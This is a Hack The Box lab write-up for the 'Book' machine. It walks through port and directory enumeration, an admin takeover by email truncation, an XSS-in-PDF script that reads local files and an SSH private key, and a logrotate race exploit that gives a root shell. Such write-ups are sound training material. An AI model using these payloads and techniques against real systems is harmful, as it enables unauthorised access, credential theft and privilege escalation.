Hack The Box - Book Writeup

5 minute read

image1

Enumeration

Add book to hosts and start an nmap scan.

Nmap

Scanned at 2020-07-08 22:26:17 EDT for 47s
Not shown: 998 closed ports
Reason: 998 resets
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMrLSBfMJGYbweKg7qPaY0uw9OBPR3dlM6GiVPDVca05vEsQKJ47YXEIZoMCIg/QvJdP6RsmeQfcFbszP/stxoVfWPLBS6csfdl4rz8MjNuRAcUQjcYhPEejogNjRZKf695ggwUybHATBXNLBpCMNrrrCqtKVvgzljdEK9rnAlOVztI8bEaLbQV87lmQJvt38bHdt+UsO+HIJwrwrUkRzXeja1k/DJ4BfWgmTNUJyUWo8XiTQrpBe7JkeQ4DwJ7HZMtpnhHDv/BIwi6Tk994tDpbTGvmbnLivvT+j22KruHE6ZvEhbts+2907haztuZdgiNG5dFPH7jKapIrZWtxTB
|   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNKAm6pa94qHHk0DuSIarpsJaCk2vUfZkgWkrXPeIorMjT/DyTCfsM2ViRnU9YSnrVj/c3OQ1vyW8eMxiRDoOB8=
|   256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICk6vCR5eZZvVb6fwpX7k054lgERxpbaEC8jyGKxJ4Xm
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Couldn’t find anything interesting on port 22. Lets proceed to port 80.

image1

We have a web app with a login page. I tried out some injections and bypass methods, but all failed. We can use the sign up feature to create a new user and login.

image1

The interface provides plethora of possible attack vectors. I tried exploiting file upload and and a possible LFI, but none of that worked. Then I found something interesting looking at the contact page.

image1

We have an admin user with the email admin@book.htb. The message in settings and the email points out that there is probably an admin interface.

Dirb

kali@kali:~$ dirb http://book.htb

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul 11 13:29:24 2020
URL_BASE: http://book.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://book.htb/ ----
==> DIRECTORY: http://book.htb/admin/                                                                                                                                                                                                     
^C> Testing: http://book.htb/apps

So we have an admin login page, but no credentials or any way to bypass. I tried registering a user with admin@book.htb as the email in the signup page, but it was throwing the error user exits.

image1

Admin Bypass

I was stuck here for a long time. After going through the forum, I spotted couple of odd stuff.

  1. There is a limit for the length of email and name. We can see some client code related to this. 
     function validateForm() {
   var x = document.forms["myForm"]["name"].value;
   var y = document.forms["myForm"]["email"].value;
   if (x == "") {
     alert("Please fill name field. Should not be more than 10 characters");
     return false;
   }
   if (y == "") {
     alert("Please fill email field. Should not be more than 20 characters");
     return false;
   }
 }
  2. If the name or email is longer than 20 characters, it truncates it at 20 characters. This can be observer if you create a user with a mail longer than 20 characters.

The string admin@book.htb is 14 characters long. So what will happen if we bypass client side restriction and register with email admin@book.htb      q. The system will truncate the user to 10 characters and we can register as admin overwriting the current admin password. And then we can login to admin panel.

image1

There is some kind of cleanup that is happening in the background. So you have to act fast, or the credentials become invalid.

SSRF via XSS in PDF

There is an option in admin panel to export the list of collections. This also contains the collections that are uploaded by user for moderation. I noticed that the attacker controlled fields title and author gets reflected in the PDF.

image1

This blog talks in detail about a very interesting SSRF attack using XSS in PDF.

The summary of the blog is that if our input is reflected in the PDF then We can inject custom script in the field to read local files. The following code can be used to read the /etc/passwd file.

 <script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc.passwd"); x.send(); </script>

Inspecting the output PDF, we can see the passwd file.

image1

Low Shell

There is a user named reader. Lets try reading the ssh keys using the same vector.

image1

And we have the ssh key. We can now login as reader.

kali@kali:~/Desktop/htb/book$ ssh -i id_rsa reader@book.htb
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.4.1-050401-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Jul 11 18:30:17 UTC 2020

  System load:  0.1                Processes:            143
  Usage of /:   26.5% of 19.56GB   Users logged in:      0
  Memory usage: 22%                IP address for ens33: 10.10.10.176
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

114 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Jan 29 13:03:06 2020 from 10.10.14.3
reader@book:~$ id
uid=1000(reader) gid=1000(reader) groups=1000(reader)

Root Shell

pspy picked up a lograte service running continuously.

2020/07/11 18:39:09 CMD: UID=0    PID=17322  | /bin/sh /root/log.sh 
2020/07/11 18:39:09 CMD: UID=0    PID=17324  | sleep 5 
2020/07/11 18:39:11 CMD: UID=0    PID=17325  | /bin/kill -s 58 17146 
2020/07/11 18:39:14 CMD: UID=0    PID=17327  | /usr/sbin/logrotate -f /root/log.cfg 
2020/07/11 18:39:14 CMD: UID=???  PID=17326  | ???
2020/07/11 18:39:14 CMD: UID=0    PID=17328  | sleep 5 
2020/07/11 18:39:19 CMD: UID=0    PID=17330  | /usr/sbin/logrotate -f /root/log.cfg 
2020/07/11 18:39:19 CMD: UID=0    PID=17329  | /bin/sh /root/log.sh 
2020/07/11 18:39:20 CMD: UID=0    PID=17331  | sleep 5 
2020/07/11 18:39:25 CMD: UID=0    PID=17333  | /usr/sbin/logrotate -f /root/log.cfg 
2020/07/11 18:39:25 CMD: UID=0    PID=17332  | /bin/sh /root/log.sh 
2020/07/11 18:39:25 CMD: UID=0    PID=17334  | sleep 5 
2020/07/11 18:39:30 CMD: UID=0    PID=17336  | /usr/sbin/logrotate -f /root/log.cfg 
2020/07/11 18:39:30 CMD: UID=0    PID=17335  | /bin/sh /root/log.sh 
2020/07/11 18:39:30 CMD: UID=0    PID=17337  | sleep 5 
2020/07/11 18:39:35 CMD: UID=0    PID=17339  | /usr/sbin/logrotate -f /root/log.cfg 
2020/07/11 18:39:35 CMD: UID=0    PID=17338  | /bin/sh /root/log.sh 
2020/07/11 18:39:35 CMD: UID=0    PID=17340  | sleep 5 
2020/07/11 18:39:40 CMD: UID=0    PID=17342  | /usr/sbin/logrotate -f /r

lograte has a privilege escalation vulnerability. We can use this to get root. One requirement of this exploit is to know the log path. There is a folder named backup in our home directory. I had to look through the forum to confirm this was the right one.

We can use two methods as payload.

  1. Write a ssh key to /authorized_keys in root folder.
  2. Use a reverse shell as the payload.

The first one is more stable.

reader@book:~$ ./log -p payload /home/reader/backups/access.log
Waiting for rotating /home/reader/backups/access.log...
Renamed /home/reader/backups with /home/reader/backups2 and created symlink to /etc/bash_completion.d
Waiting 1 seconds before writing payload...
Done!

I had to manually change the access.log file to trigger the exploit. You can also re login to reader from another window to trigger it.

SSH into the box as root

kali@kali:~/Desktop/htb/book$ ssh -i id_rsa_n root@book.htb
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.4.1-050401-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Jul 11 18:55:34 UTC 2020

  System load:  0.01               Processes:            148
  Usage of /:   26.6% of 19.56GB   Users logged in:      1
  Memory usage: 29%                IP address for ens33: 10.10.10.176
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

114 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Jul 11 18:55:02 2020 from ::1
root@book:~# id
uid=0(root) gid=0(root) groups=0(root)

And we are root!

Tags:

Categories:

Updated:

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.